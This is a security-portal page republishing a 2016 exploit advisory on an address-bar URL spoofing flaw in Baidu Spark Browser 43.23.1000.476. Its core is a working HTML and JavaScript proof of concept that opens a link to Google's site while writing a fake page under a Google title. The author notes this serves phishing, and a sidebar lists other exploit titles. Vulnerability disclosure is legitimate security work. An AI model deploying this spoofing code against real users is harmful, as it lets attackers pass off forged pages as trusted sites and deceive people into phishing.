首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Baidu Spark Browser 43.23.1000.476 - Address Bar URL Spoofing
来源:liuzhu09@huawei.com 作者:liu zhu 发布时间:2016-05-06  
<!--
Exploit Title: Baidu Spark Browser URL spoof vulnerability
Date:2016-05-02
Exploit Author: liu zhu
Vendor Homepage:http://en.browser.baidu.com/
<http://en.browser.baidu.com/>Software Link:http://en.browser.baidu.com/query/fullpackage.exe?lang=en
Version:43.23.1000.476
Tested on:Win7/WinXP
 
details:
The baidu spark browser is vulnerable to Address Bar Spoofing  in the latest version of the browser(43.23.1000.476). Using the specail javascript code it was able to spoof the URL in the address bar which could trick the user that he is visiting a different site than he thinks. it<http://thinks.it/> can be used to phinshing attack.
 
PoC:
------------------------------------------------------------------------------------------------
-->
 
<SCRIPT LANGUAGE="JavaScript">
function winopen()
{OW=window.open("", "newwin");
OW.document.write("<TITLE>Google</TITLE>");
OW.document.write("<h1>The Phishing Page !!</h1>");
OW.document.close();
}
</SCRIPT>
<a href="https://www.google.com.hk/" target="newwin" onclick="setTimeout('winopen()', 1);">Google Home Page</a>
 
<!--
------------------------------------------------------------------------
Save it as a HTML file, and then execute it in Baidu Spark Browser.
 
Affact:
The vulnerability can be used to Phishing attack, Because the URL can be the same as the URL that the visitor wants to visit,but the content is fake.
 
Contact:
liuzhu09@huawei.com
-->
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ImageMagick < 6.9.3-9 - Multip
·i.FTP 2.21 - Host Address / UR
·PHP Imagick 3.3.0 - disable_fu
·Dell SonicWall Scrutinizer <=
·TRN Threaded USENET News Reade
·ASUS Memory Mapping Driver (AS
·Linux x64 - Bind Shell Shellco
·CIScan 1.00 - Hostname/IP Fiel
·Apache Struts Dynamic Method I
·RPCScan 2.03 - Hostname/IP Fie
·Acunetix WVS 10 - Remote Comma
·ImageMagick Delegate Arbitrary
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved